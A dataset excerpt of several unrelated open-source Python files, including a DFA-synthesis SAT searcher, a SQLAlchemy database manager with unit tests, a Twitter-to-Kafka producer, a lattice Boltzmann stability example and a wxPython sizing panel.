max_stars_repo_path
stringlengths
3
269
max_stars_repo_name
stringlengths
4
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.05M
score
float64
0.23
5.13
int_score
int64
0
5
tests/__init__.py
bio2bel/famplex
0
11800
<reponame>bio2bel/famplex<filename>tests/__init__.py # -*- coding: utf-8 -*- """Tests for Bio2BEL FamPlex."""
0.847656
1
dfainductor/algorithms/searchers.py
ctlab/DFA-Inductor-py
2
11801
<gh_stars>1-10 from typing import List from pysat.solvers import Solver from ..variables import VarPool from .reductions import ClauseGenerator from ..examples import BaseExamplesProvider from ..logging_utils import * from ..statistics import STATISTICS from ..structures import APTA, DFA, InconsistencyGraph class LSUS: _solver: Solver def __init__(self, apta: APTA, ig: InconsistencyGraph, solver_name: str, sb_strategy: str, cegar_mode: str, examples_provider: BaseExamplesProvider, assumptions_mode: str) -> None: self._apta = apta self._ig = ig self._solver_name = solver_name self._sb_strategy = sb_strategy self._cegar_mode = cegar_mode self._examples_provider = examples_provider self._assumptions_mode = assumptions_mode self._var_pool: VarPool = VarPool() self._clause_generator = ClauseGenerator(self._apta, self._ig, self._var_pool, self._assumptions_mode, self._sb_strategy) def _try_to_synthesize_dfa(self, size: int, assumptions: List[int]) -> Optional[DFA]: log_info('Vars in CNF: {0}'.format(self._solver.nof_vars())) log_info('Clauses in CNF: {0}'.format(self._solver.nof_clauses())) STATISTICS.start_solving_timer() is_sat = self._solver.solve(assumptions=assumptions) STATISTICS.stop_solving_timer() if is_sat: assignment = self._solver.get_model() dfa = DFA() for i in range(size): dfa.add_state( DFA.State.StateStatus.from_bool(assignment[self._var_pool.var('z', i) - 1] > 0) ) for i in range(size): for label in range(self._apta.alphabet_size): for j in range(size): if assignment[self._var_pool.var('y', i, label, j) - 1] > 0: dfa.add_transition(i, self._apta.alphabet[label], j) return dfa else: return None def search(self, lower_bound: int, upper_bound: int) -> Optional[DFA]: self._solver = Solver(self._solver_name) log_info('Solver has been started.') for size in range(lower_bound, upper_bound + 1): if self._assumptions_mode == 'none' and size > lower_bound: self._solver = Solver(self._solver_name) log_info('Solver has been restarted.') log_br() log_info('Trying to build a DFA with {0} states.'.format(size)) STATISTICS.start_formula_timer() if self._assumptions_mode != 'none' and size > lower_bound: self._clause_generator.generate_with_new_size(self._solver, size - 1, size) else: self._clause_generator.generate(self._solver, size) STATISTICS.stop_formula_timer() assumptions = self._clause_generator.build_assumptions(size, self._solver) while True: dfa = self._try_to_synthesize_dfa(size, assumptions) if dfa: counter_examples = self._examples_provider.get_counter_examples(dfa) if counter_examples: log_info('An inconsistent DFA with {0} states is found.'.format(size)) log_info('Added {0} counterexamples.'.format(len(counter_examples))) STATISTICS.start_apta_building_timer() (new_nodes_from, changed_statuses) = self._apta.add_examples(counter_examples) STATISTICS.stop_apta_building_timer() STATISTICS.start_ig_building_timer() self._ig.update(new_nodes_from) STATISTICS.stop_ig_building_timer() STATISTICS.start_formula_timer() self._clause_generator.generate_with_new_counterexamples(self._solver, size, new_nodes_from, changed_statuses) STATISTICS.stop_formula_timer() continue break if not dfa: log_info('Not found a DFA with {0} states.'.format(size)) else: log_success('The DFA with {0} states is found!'.format(size)) return dfa return None
2.1875
2
lc_sqlalchemy_dbutils/manager.py
libcommon/sqlalchemy-dbutils-py
0
11802
<reponame>libcommon/sqlalchemy-dbutils-py ## -*- coding: UTF8 -*- ## manager.py ## Copyright (c) 2020 libcommon ## ## Permission is hereby granted, free of charge, to any person obtaining a copy ## of this software and associated documentation files (the "Software"), to deal ## in the Software without restriction, including without limitation the rights ## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell ## copies of the Software, and to permit persons to whom the Software is ## furnished to do so, subject to the following conditions: ## ## The above copyright notice and this permission notice shall be included in all ## copies or substantial portions of the Software. ## ## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR ## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, ## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE ## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER ## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, ## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE ## SOFTWARE. from getpass import getpass import os from pathlib import Path from typing import Any, Optional, Union from sqlalchemy import create_engine as sqla_create_engine, MetaData from sqlalchemy.engine import Engine from sqlalchemy.engine.url import make_url, URL from sqlalchemy.orm import scoped_session as ScopedSession, Session, sessionmaker as SessionMaker from sqlalchemy.orm.query import Query __author__ = "libcommon" DBManagerSessionFactory = Union[ScopedSession, SessionMaker] DBManagerSession = Union[ScopedSession, Session] ConnectionURL = Union[str, URL] class DBManager: """SQLAlchemy ORM database connection manager with utility methods for connecting to, querying, performing/rolling back transactions on, and deleting records from the database. Agnostic to database backend and designed for use within a single process (not shared by multiple processes.) """ __slots__ = ("_engine", "_scoped_sessions", "_session", "_session_factory", "connection_url", "metadata",) @classmethod def from_file(cls, config_path_str: str) -> "DBManager": """ Args: config_path => path to file containing connection URL Description: Reads connection URL from config file and creates instance of class. Will validate connection URL and if it doesn't have password, will prompt user. Preconditions: Connection URL must be a valid RFC1738 URL and must be the only content in the file. Raises: FileNotFoundError: if provided config_path isn't an existing file ValueError: if validation (parsing) of connection URL fails """ # Ensure config_path is existing file config_path = Path(config_path_str) if not config_path.is_file(): raise FileNotFoundError(str(config_path)) # Read first line from file and use as connection URL with open(str(config_path)) as config_file: connection_url_str = config_file.read().strip() # Parse connection URL into various components try: connection_url = make_url(connection_url_str) except Exception as exc: raise ValueError("Failed to parse URL from file ({})".format(exc)) # If is not SQLite file and password not provided, get password from user if not ("sqlite" in connection_url.drivername or connection_url.password): passwd = getpass("Enter database password: ") connection_url.password = <PASSWORD> return cls(connection_url) def __init__(self, connection_url: ConnectionURL, metadata: Optional[MetaData] = None, scoped_sessions: bool = False): if isinstance(connection_url, str): connection_url = make_url(connection_url) self.connection_url = connection_url self.metadata = metadata self._scoped_sessions = scoped_sessions self._engine: Optional[Engine] = None self._session: Optional[Session] = None self._session_factory: Optional[DBManagerSessionFactory] = None def create_engine(self, **kwargs) -> "DBManager": """ Args: kwargs => passed to SQLAlchemy Engine constructor Description: Create SQLAlchemy Engine using self.connection_url. See: https://docs.sqlalchemy.org/en/13/core/engines.html Preconditions: N/A Raises: RuntimeError: if self.engine is already set and persist is True """ # Ensure self._engine isn't already defined # NOTE: Consider whether this implementation makes sense, or if it makes more sense # to simply dispose of existing engine (with DEBUG log) before creating new one. if self._engine: raise RuntimeError("Cannot attach new Engine without removing existing one") # Create SQLAlchemy Engine with connection URL engine = sqla_create_engine(self.connection_url, **kwargs) self._engine = engine return self def close_engine(self) -> "DBManager": """ Args: N/A Description: Close and dispose of existing Engine and connection pool on self._engine if defined. Preconditions: N/A Raises: N/A """ # If have active session, close it before engine if self.session(): self.close_session() # If self._engine defined if self._engine: # Dispose of existing connection pool self._engine.dispose() self._engine = None return self def with_metadata(self, metadata: MetaData) -> "DBManager": """ Args: N/A Description: Setter for self.metadata using builder pattern. Preconditions: N/A Raises: N/A """ self.metadata = metadata return self def bootstrap_db(self) -> "DBManager": """ Args: N/A Description: Create all tables defined in self.metadata. See: https://docs.sqlalchemy.org/en/13/core/metadata.html Preconditions: N/A Raises: N/A """ if not self._engine: raise RuntimeError("Cannot bootstrap database without an Engine") if not self.metadata: raise RuntimeError("Cannot bootstrap database with MetaData") self.metadata.create_all(self._engine) return self def create_session_factory(self, **kwargs) -> "DBManager": """ Args: kwargs => passed to SQLAlchemy sessionmaker constructor Description: Create SQLAlchemy scoped_session if self._scoped_sessions is True, otherwise sessionmaker. All kwargs are passed to sessionmaker constructor. This method should only be called _once_ by the DBManager. SQLAlchemy doesn't recommend manually closing all sessions, and the mechanics for doing so have changed across versions. See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#session-and-sessionmaker and https://docs.sqlalchemy.org/en/13/orm/contextual.html#sqlalchemy.orm.scoping.scoped_session and https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.sessionmaker.close_all Preconditions: N/A Raises: RuntimeError: if self._session_factory is already defined, or if self._engine isn't defined """ # Ensure self._session_factory isn't already defined if self._session_factory: raise RuntimeError("Session factory already created") # Ensure self._engine is defined if not self._engine: raise RuntimeError("Cannot create session factory without an Engine") # Generate sessionmaker session factory self._session_factory = SessionMaker(bind=self._engine, **kwargs) # If scoped sessions, wrap in scoped_sessions factory if self._scoped_sessions: self._session_factory = ScopedSession(self._session_factory) return self def connect(self, bootstrap: bool = False) -> "DBManager": """ Args: N/A Description: Create database engine and session factory (but _not_ active session). gen_session must be called subsequently to create an active session. If bootstrap specified, use self.metdata and self._engine to create all tables, indexes, views, etc. Preconditions: N/A Raises: ValueError: if bootstrap and self.metadata isn't defined """ # Generate database engine if needed if not self._engine: self.create_engine() # Bootstrap database if asked if bootstrap: self.bootstrap_db() # Generate session factory if needed if not self._session_factory: self.create_session_factory() return self def gen_session(self, persist: bool = True) -> DBManagerSession: """ Args: persist => whether to persist created session on self Description: Generate new database session. If persist is True, assign new session to self._session. In this way, the DBManager can act simply as a factory for new sessions, or as a more complete DB manager. Use the `session` method to access the active session. See: https://docs.sqlalchemy.org/en/13/orm/session_basics.html#basics-of-using-a-session Preconditions: N/A Raises: RuntimeError: if self._session_factory hasn't been created yet, or if self._session is already set and persist is True (for non-scoped sessions) """ # Ensure session factory has been created if not self._session_factory: raise RuntimeError("Session factory must be created before a session can be generated") # If scoped sessions, return scoped session manager if self._scoped_sessions: return self._session_factory # type: ignore # Otherwise, generate new session from session factory session = self._session_factory() # If persist session to self, ensure self.session isn't already defined if persist: if self._session: raise RuntimeError("Cannot attach new Session without removing existing Session") self._session = session return session def session(self) -> Optional[DBManagerSession]: """ Args: N/A Description: Current session (if exists). Preconditions: N/A Raises: N/A """ # If scoped sessions, return scoped session manager if self._scoped_sessions: return self._session_factory # type: ignore # Otherwise, return self._session return self._session def close_session(self) -> "DBManager": """ Args: N/A Description: Close the current session. Preconditions: N/A Raises: N/A """ # If scoped sessions and session factory has been initialized, # remove current session if self._scoped_sessions and self._session_factory: self._session_factory.remove() # type: ignore # If session on self, close it elif self._session: self._session.close() self._session = None return self def _assert_session(self) -> DBManagerSession: """ Args: N/A Description: Raise ValueError if no existing session. If scoped_sessions is True, then requires self._session_factory to be defined. Otherwise, requires self._session to be defined (non-None). Preconditions: N/A Raises: ValueError: if self._session not defined """ session = self.session() if not session: raise RuntimeError("Must have active session") return session def query(self, model: Any, **kwargs) -> Query: """ Args: model => model of table to query kwargs => passed to query.filter method Description: Wrapper for Session.query, with option to build WHERE clause. See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.query Preconditions: record is instance of class whose parent class was created using SQLAlchemy's declarative_base. Raises: RuntimeError: if self._session isn't defined """ # Ensure active session session = self._assert_session() query = session.query(model) for arg in kwargs: query = query.filter(getattr(model, arg) == kwargs[arg]) return query def add(self, record: Any, commit: bool = False) -> "DBManager": """ Args: record => record to add to session commit => whether to commit the transaction after adding record to session Description: Wrapper for Session.add, with option to commit the transaction. See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.add Preconditions: record is instance of class whose parent class was created using SQLAlchemy's declarative_base. Raises: RuntimeError: if self._session isn't defined """ # Ensure active session session = self._assert_session() # Add record to session session.add(record) # Commit if asked if commit: session.commit() return self def delete(self, record: Any, commit: bool = False) -> "DBManager": """ Args: record => record to delete from session commit => whether to commit the transaction after deleting record from session Description: Wrapper for Session.delete, with option to commit the transaction. See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.delete Preconditions: record is instance of class whose parent class was created using SQLAlchemy's declarative_base. Raises: RuntimeError: if self._session isn't defined """ # Ensure active session session = self._assert_session() # Delete record from session session.delete(record) # Commit if asked if commit: session.commit() return self def commit(self) -> "DBManager": """ Args: N/A Description: Wrapper for Session.commit. See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.commit Preconditions: N/A Raises: RuntimeError: if self._session isn't defined """ # Ensure active session session = self._assert_session() session.commit() return self def rollback(self) -> "DBManager": """ Args: N/A Description: Wrapper for Session.rollback. See: https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.rollback Preconditions: N/A Raises: RuntimeError: if self._session isn't defined """ # Ensure active session session = self._assert_session() session.rollback() return self if os.environ.get("ENVIRONMENT") == "TEST": import unittest from unittest.mock import patch, mock_open from tests.common import BaseTable, User class TestDBManager(unittest.TestCase): """Tests for DBManager API.""" def setUp(self): self.connection_url_default = "postgresql://dbuser@pghost10/appdb" self.connection_url_with_password = "postgresql://dbuser:kx%25jj5%2Fg@pghost10/appdb" self.connection_url_sqlite = "sqlite://" def test_from_file_invalid_filepath(self): """Test that invalid filepath to DBManager.from_file raises FileNotFoundError. """ nonexistent_filepath = Path().cwd().joinpath("url_config.txt") self.assertRaises(FileNotFoundError, DBManager.from_file, nonexistent_filepath) def test_from_file_invalid_url(self): """Test that invalid URL in file passed to DBManager.from_file raises ValueError. """ # |--| port is not number connection_url = "postgresql+pg8000://dbuser:kx%25jj5%2Fg@pghost10:port/appdb" with patch("{}.open".format(__name__), mock_open(read_data=connection_url)): self.assertRaises(ValueError, DBManager.from_file, __file__) def test_from_file_no_passwd_sqlite(self): """Test that if connection URL isn't for SQLite and no password provided, prompts for password and updates database connection URL. """ passwd = "<PASSWORD>" with patch("{}.getpass".format(__name__), return_value=passwd), \ patch("{}.open".format(__name__), mock_open(read_data=self.connection_url_default)): manager = DBManager.from_file(__file__) self.assertEqual(passwd, manager.connection_url.password) def test_create_engine_with_existing(self): """Test that engine creation raises RuntimeError when engine is already set. """ manager = DBManager(self.connection_url_sqlite).create_engine() self.assertRaises(RuntimeError, manager.create_engine) def test_close_engine_with_existing(self): """Test that engine is set to None if already set.""" manager = DBManager(self.connection_url_sqlite).create_engine() manager.close_engine() self.assertIsNone(manager._engine) def test_bootstrap_db(self): """Test that bootstrap_db raises RuntimeError without Engine and MetaData.""" manager = DBManager(self.connection_url_sqlite) # Bootstrap database without Engine self.assertRaises(RuntimeError, manager.bootstrap_db) manager.create_engine() # Bootstrap database without MetaData self.assertRaises(RuntimeError, manager.bootstrap_db) def test_create_session_factory_without_engine(self): """Test that session factory creation raises RuntimeError without Engine.""" manager = DBManager(self.connection_url_sqlite) self.assertRaises(RuntimeError, manager.create_session_factory) def test_create_session_factory_with_existing(self): """Test that session factory creation raises RuntimeError with existing session factory. """ manager = DBManager(self.connection_url_sqlite).connect() self.assertRaises(RuntimeError, manager.create_session_factory) def test_gen_session_without_factory(self): """Test that session generation raises RuntimeError without session factory.""" manager = DBManager(self.connection_url_sqlite) self.assertRaises(RuntimeError, manager.gen_session) manager.create_engine() self.assertRaises(RuntimeError, manager.gen_session) def test_gen_session_non_scoped_persist(self): """Test that non-scoped session persists to self if persist is True.""" manager = DBManager(self.connection_url_sqlite).connect() session = manager.gen_session(persist=True) self.assertIsNotNone(session) self.assertEqual(session, manager._session) def test_close_session_with_existing(self): """Test that persisted session is set to None if already set.""" manager = DBManager(self.connection_url_sqlite).connect() manager.gen_session(persist=True) self.assertIsNotNone(manager._session) manager.close_session() self.assertIsNone(manager._session) def test_session_methods_no_session(self): """Test that query, add, delete, commit, and rollback methods fail without existing Session. """ manager = DBManager(self.connection_url_sqlite, metadata=BaseTable.metadata).connect() user_record = User(first_name="Samuel", last_name="Jackson", email="<EMAIL>") self.assertRaises(RuntimeError, manager.query, User) self.assertRaises(RuntimeError, manager.commit) self.assertRaises(RuntimeError, manager.rollback) for method_name in ("add", "delete"): with self.subTest(test_name=method_name): self.assertRaises(RuntimeError, getattr(manager, method_name), user_record) def test_query_where_clause_kwargs(self): """Test that kwargs supplied to query get properly passed to session.query.filter to build WHERE clause. """ manager = DBManager(self.connection_url_sqlite, metadata=BaseTable.metadata).connect() manager.gen_session(persist=True) expected_query = ("SELECT \"user\".id, \"user\".first_name, \"user\".last_name, \"user\".email " "FROM \"user\" " "WHERE \"user\".first_name = 'Samuel' AND \"user\".email = '<EMAIL>'") query_str = (str(manager .query(User, first_name="Samuel", email="<EMAIL>") .statement .compile(compile_kwargs={"literal_binds": True})) .replace("\n", "")) self.assertEqual(expected_query, query_str)
1.648438
2
mazeexperiment/__main__.py
NickAnderegg/rpacr-mazeexperiment
0
11803
<gh_stars>0 # -*- coding: utf-8 -*- """mazeexperiment.__main__: executed when mazeexperiment directory is called as script.""" from .mazeexperiment import main main()
1.203125
1
kafka_demo_1/producer.py
Aguinore/udemy_kafka_demo
0
11804
from tweepy import StreamListener, OAuthHandler, Stream from configs import Configs import sys class StdOutListener(StreamListener): def __init__(self, kafka_producer, topic): super().__init__() self.kafka_producer = kafka_producer self.topic = topic """ A listener handles tweets that are received from the stream. """ def on_data(self, data): self.kafka_producer.produce(topic=self.topic, value=data) print(data) return True def on_error(self, status): print(status) def exit_gracefully(kafka_producer): if kafka_producer is not None: kafka_producer.flush(30) print('kafka producer flushed') sys.exit(0) def create_twitter_client(kafka_producer, configs): listener = StdOutListener(kafka_producer, configs.kafka_topic) auth = OAuthHandler(configs.consumer_key, configs.consumer_secret) auth.set_access_token(configs.access_token_key, configs.access_token_secret) return Stream(auth, listener) def create_kafka_producer(): # https://www.confluent.io/blog/introduction-to-apache-kafka-for-python-programmers/ from confluent_kafka import Producer p = Producer({'bootstrap.servers': 'localhost:9092', 'acks': 'all', 'enable.idempotence': 'true', 'compression.type': 'snappy'}) return p configs = Configs() producer = None try: producer = create_kafka_producer() client = create_twitter_client(producer, configs) client.filter(track=configs.twitter_topics) finally: exit_gracefully(producer)
2.625
3
demo/examples/stability/advection_d2q4.py
bgraille/pylbm
106
11805
""" Stability analysis of the D2Q4 solver for the advection equation d_t(u) + c_x d_x(u) + c_y d_y(u) = 0 """ import sympy as sp import pylbm # pylint: disable=invalid-name # symbolic variables U, X, Y = sp.symbols('U, X, Y') # symbolic parameters LA, CX, CY = sp.symbols('lambda, cx, cy', constants=True) S_1, S_2 = sp.symbols('s1, s2', constants=True) # numerical parameters la = 1. # velocity of the scheme s_1, s_2 = 2., 1. # relaxation parameters c_x, c_y = 0.5, 0.25 # velocity of the advection equation dico = { 'dim': 2, 'scheme_velocity': LA, 'schemes': [ { 'velocities': [1, 2, 3, 4], 'conserved_moments': U, 'polynomials': [1, X, Y, X**2-Y**2], 'relaxation_parameters': [0, S_1, S_1, S_2], 'equilibrium': [ U, CX*U, CY*U, (CX**2-CY**2)*U ], }, ], 'parameters': { LA: la, S_1: s_1, S_2: s_2, CX: c_x, CY: c_y, }, 'relative_velocity': [CX, CY], } scheme = pylbm.Scheme(dico) stab = pylbm.Stability(scheme) stab.visualize({ 'parameters': { CX: { 'range': [0, 1], 'init': c_x, 'step': 0.01, }, CY: { 'range': [0, 1], 'init': c_y, 'step': 0.01, }, S_1: { 'name': r"$s_1$", 'range': [0, 2], 'init': s_1, 'step': 0.01, }, S_2: { 'name': r"$s_2$", 'range': [0, 2], 'init': s_2, 'step': 0.01, }, }, 'number_of_wave_vectors': 4096, })
2.421875
2
glimix_core/_util/_array.py
Horta/limix-inference
7
11806
from numpy import reshape def vec(x): return reshape(x, (-1,) + x.shape[2:], order="F") def unvec(x, shape): return reshape(x, shape, order="F")
3.421875
3
src/tests/component/test_engine_manager.py
carbonblack/cbc-binary-toolkit
8
11807
# -*- coding: utf-8 -*- # ******************************************************* # Copyright (c) VMware, Inc. 2020-2021. All Rights Reserved. # SPDX-License-Identifier: MIT # ******************************************************* # * # * DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT # * WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN, # * EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED # * WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY, # * NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE. """Unit tests for the analysis engine""" import pytest from cbc_binary_toolkit import InitializationError from cbc_binary_toolkit.config import Config from cbc_binary_toolkit.engine import LocalEngineManager from cbc_binary_toolkit.schemas import EngineResponseSchema from tests.component.engine_fixtures.mock_engine import MockLocalEngine from tests.component.schema_fixtures.mock_data import VALID_BINARY_METADATA, MISSING_FIELDS_BINARY_METADATA ENGINE_NAME = "MockEngine" @pytest.fixture(scope="session") def config(): """Configuration for all the test cases in this module.""" return Config.load(f""" id: cbc_binary_toolkit version: 0.0.1 engine: name: {ENGINE_NAME} type: local _provider: tests.component.engine_fixtures.mock_engine.MockLocalEngineFactory Test: TestPassed """) # ==================================== Unit TESTS BELOW ==================================== def test_create_engine(config): """Test successful creation of MockLocalEngine""" manager = LocalEngineManager(config) assert isinstance(manager.create_engine(), MockLocalEngine) def test_analyze(config): """Test analyze pass through""" manager = LocalEngineManager(config) assert EngineResponseSchema.validate(manager.analyze(VALID_BINARY_METADATA)) @pytest.mark.parametrize("input", [ MISSING_FIELDS_BINARY_METADATA, {} ]) def test_analyze_invalid_schema(config, input): """Test analyze pass through""" manager = LocalEngineManager(config) result = manager.analyze(input) if result["binary_hash"] is not None: result = EngineResponseSchema.validate(result) assert not result["success"] @pytest.mark.parametrize("engine_config, exception", [ [""" id: cbc_binary_toolkit engine: name: {ENGINE_NAME} type: unknown num_threads: 1 _provider: tests.component.engine_fixtures.mock_engine.MockLocalEngineFactory """, InitializationError], [""" id: cbc_binary_toolkit engine: name: {ENGINE_NAME} type: local _provider: INVALID.INVALID """, ImportError], [""" id: cbc_binary_toolkit engine: name: {ENGINE_NAME} type: local _provider: cbc_binary_toolkit.engine.LocalEngineFactory """, NotImplementedError], [f""" id: cbc_binary_toolkit version: 0.0.1 engine: name: {ENGINE_NAME} type: local _provider: tests.component.engine_fixtures.mock_engine.MockLocalEngineFactory """, AssertionError] ]) def test_failed_init(engine_config, exception): """Test raised exceptions on init of LocalEngineManager""" config = Config.load(engine_config) with pytest.raises(exception): LocalEngineManager(config)
1.9375
2
funolympics/apps.py
codeema/Yokiyo
0
11808
<filename>funolympics/apps.py from django.apps import AppConfig class FunolympicsConfig(AppConfig): name = 'funolympics'
1.210938
1
src/gt4sd/algorithms/generation/polymer_blocks/core.py
hhhsu0825/gt4sd-core
0
11809
<filename>src/gt4sd/algorithms/generation/polymer_blocks/core.py """PaccMann vanilla generator trained on polymer building blocks (catalysts/monomers).""" import logging import os from dataclasses import field from typing import ClassVar, Dict, Optional, TypeVar from ....domains.materials import SmallMolecule, validate_molecules from ....exceptions import InvalidItem from ....training_pipelines.core import TrainingPipelineArguments from ....training_pipelines.paccmann.core import PaccMannSavingArguments from ...core import AlgorithmConfiguration, GeneratorAlgorithm, Untargeted from ...registry import ApplicationsRegistry from .implementation import Generator logger = logging.getLogger(__name__) logger.addHandler(logging.NullHandler()) T = type(None) S = TypeVar("S", bound=SmallMolecule) class PolymerBlocks(GeneratorAlgorithm[S, T]): def __init__( self, configuration: AlgorithmConfiguration, target: Optional[T] = None ): """Polymer blocks generation. Args: configuration: domain and application specification, defining types and validations. target: unused since it is not a conditional generator. Example: An example for generating small molecules (SMILES) that resembles monomers/catalysts for polymer synthesis:: configuration = PolymerBlocksGenerator() polymer_blocks = PolymerBlocks(configuration=configuration) items = list(polymer_blocks.sample(10)) print(items) """ configuration = self.validate_configuration(configuration) # TODO there might also be a validation/check on the target input super().__init__( configuration=configuration, target=None, # type:ignore ) def get_generator( self, configuration: AlgorithmConfiguration[S, T], target: Optional[T], ) -> Untargeted: """Get the function to sample batches via the Generator. Args: configuration: helps to set up the application. target: context or condition for the generation. Unused in the algorithm. Returns: callable generating a batch of items. """ logger.info("ensure artifacts for the application are present.") self.local_artifacts = configuration.ensure_artifacts() implementation: Generator = configuration.get_conditional_generator( # type: ignore self.local_artifacts ) return implementation.sample def validate_configuration( self, configuration: AlgorithmConfiguration ) -> AlgorithmConfiguration: # TODO raise InvalidAlgorithmConfiguration assert isinstance(configuration, AlgorithmConfiguration) return configuration @ApplicationsRegistry.register_algorithm_application(PolymerBlocks) class PolymerBlocksGenerator(AlgorithmConfiguration[SmallMolecule, None]): """Configuration to generate subunits of polymers.""" algorithm_type: ClassVar[str] = "generation" domain: ClassVar[str] = "materials" algorithm_version: str = "v0" batch_size: int = field( default=32, metadata=dict(description="Batch size used for the generative model sampling."), ) generated_length: int = field( default=100, metadata=dict( description="Maximum length in tokens of the generated molcules (relates to the SMILES length)." ), ) def get_target_description(self) -> Optional[Dict[str, str]]: """Get description of the target for generation. Returns: target description, returns None in case no target is used. """ return None def get_conditional_generator(self, resources_path: str) -> Generator: return Generator( resources_path=resources_path, generated_length=self.generated_length, batch_size=self.batch_size, ) def validate_item(self, item: str) -> SmallMolecule: ( molecules, _, ) = validate_molecules([item]) if molecules[0] is None: raise InvalidItem( title="InvalidSMILES", detail=f'rdkit.Chem.MolFromSmiles returned None for "{item}"', ) return SmallMolecule(item) @classmethod def get_filepath_mappings_for_training_pipeline_arguments( cls, training_pipeline_arguments: TrainingPipelineArguments ) -> Dict[str, str]: """Ger filepath mappings for the given training pipeline arguments. Args: training_pipeline_arguments: training pipeline arguments. Returns: a mapping between artifacts' files and training pipeline's output files. """ if isinstance(training_pipeline_arguments, PaccMannSavingArguments): return { "smiles_language.pkl": os.path.join( training_pipeline_arguments.model_path, f"{training_pipeline_arguments.training_name}.lang", ), "params.json": os.path.join( training_pipeline_arguments.model_path, training_pipeline_arguments.training_name, "model_params.json", ), "weights.pt": os.path.join( training_pipeline_arguments.model_path, training_pipeline_arguments.training_name, "weights", "best_rec.pt", ), } else: return super().get_filepath_mappings_for_training_pipeline_arguments( training_pipeline_arguments )
2.359375
2
src/form/panel/MultiPanel.py
kaorin/vmd_sizing
32
11810
<gh_stars>10-100 # -*- coding: utf-8 -*- # import wx import wx.lib.newevent from form.panel.BasePanel import BasePanel from form.parts.SizingFileSet import SizingFileSet from module.MMath import MRect, MVector3D, MVector4D, MQuaternion, MMatrix4x4 # noqa from utils import MFileUtils # noqa from utils.MLogger import MLogger # noqa logger = MLogger(__name__) class MultiPanel(BasePanel): def __init__(self, frame: wx.Frame, parent: wx.Notebook, tab_idx: int, file_hitories: dict): super().__init__(frame, parent, tab_idx) self.file_hitories = file_hitories self.header_panel = wx.Panel(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL) self.header_sizer = wx.BoxSizer(wx.VERTICAL) self.description_txt = wx.StaticText(self.header_panel, wx.ID_ANY, "複数人数モーションなどを比率を合わせてサイジングする事ができます。2人目以降を指定して下さい。" \ + "\n縮尺を強制的に変えてますので、足などが元モーションからズレる場合があります。" \ + "\n間違えてファイルセットを追加してしまった場合は、4つのファイル欄をすべて空にしてください。", wx.DefaultPosition, wx.DefaultSize, 0) self.header_sizer.Add(self.description_txt, 0, wx.ALL, 5) self.btn_sizer = wx.BoxSizer(wx.HORIZONTAL) # ファイルセットクリアボタン self.clear_btn_ctrl = wx.Button(self.header_panel, wx.ID_ANY, u"ファイルセットクリア", wx.DefaultPosition, wx.DefaultSize, 0) self.clear_btn_ctrl.SetToolTip(u"既に入力されたデータをすべて空にします。") self.clear_btn_ctrl.Bind(wx.EVT_BUTTON, self.on_clear_set) self.btn_sizer.Add(self.clear_btn_ctrl, 0, wx.ALL, 5) # ファイルセットクリアボタン self.add_btn_ctrl = wx.Button(self.header_panel, wx.ID_ANY, u"ファイルセット追加", wx.DefaultPosition, wx.DefaultSize, 0) self.add_btn_ctrl.SetToolTip(u"サイジングに必要なファイルセットをパネルに追加します。") self.add_btn_ctrl.Bind(wx.EVT_BUTTON, self.on_add_set) self.btn_sizer.Add(self.add_btn_ctrl, 0, wx.ALL, 5) self.header_sizer.Add(self.btn_sizer, 0, wx.ALIGN_RIGHT | wx.ALL, 5) self.header_panel.SetSizer(self.header_sizer) self.header_panel.Layout() self.sizer.Add(self.header_panel, 0, wx.EXPAND | wx.ALL, 5) # ファイルセット self.file_set_list = [] # ファイルセット用基本Sizer self.set_base_sizer = wx.BoxSizer(wx.VERTICAL) self.scrolled_window = MultiFileSetScrolledWindow(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, \ wx.FULL_REPAINT_ON_RESIZE | wx.VSCROLL | wx.ALWAYS_SHOW_SB) # self.scrolled_window.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DLIGHT)) # self.scrolled_window.SetBackgroundColour("BLUE") self.scrolled_window.SetScrollRate(5, 5) self.scrolled_window.set_file_set_list(self.file_set_list) self.scrolled_window.SetSizer(self.set_base_sizer) self.scrolled_window.Layout() self.sizer.Add(self.scrolled_window, 1, wx.ALL | wx.EXPAND | wx.FIXED_MINSIZE, 5) self.fit() def on_add_set(self, event: wx.Event): self.file_set_list.append(SizingFileSet(self.frame, self.scrolled_window, self.file_hitories, len(self.file_set_list) + 2)) self.set_base_sizer.Add(self.file_set_list[-1].set_sizer, 0, wx.ALL, 5) self.set_base_sizer.Layout() # スクロールバーの表示のためにサイズ調整 self.sizer.Layout() # self.sizer.FitInside(self.scrolled_window) if self.frame.arm_panel_ctrl.arm_alignment_finger_flg_ctrl.GetValue() and len(self.file_set_list) > 0: self.frame.on_popup_finger_warning(event) event.Skip() def on_clear_set(self, event: wx.Event): for file_set in self.file_set_list: file_set.motion_vmd_file_ctrl.file_ctrl.SetPath("") 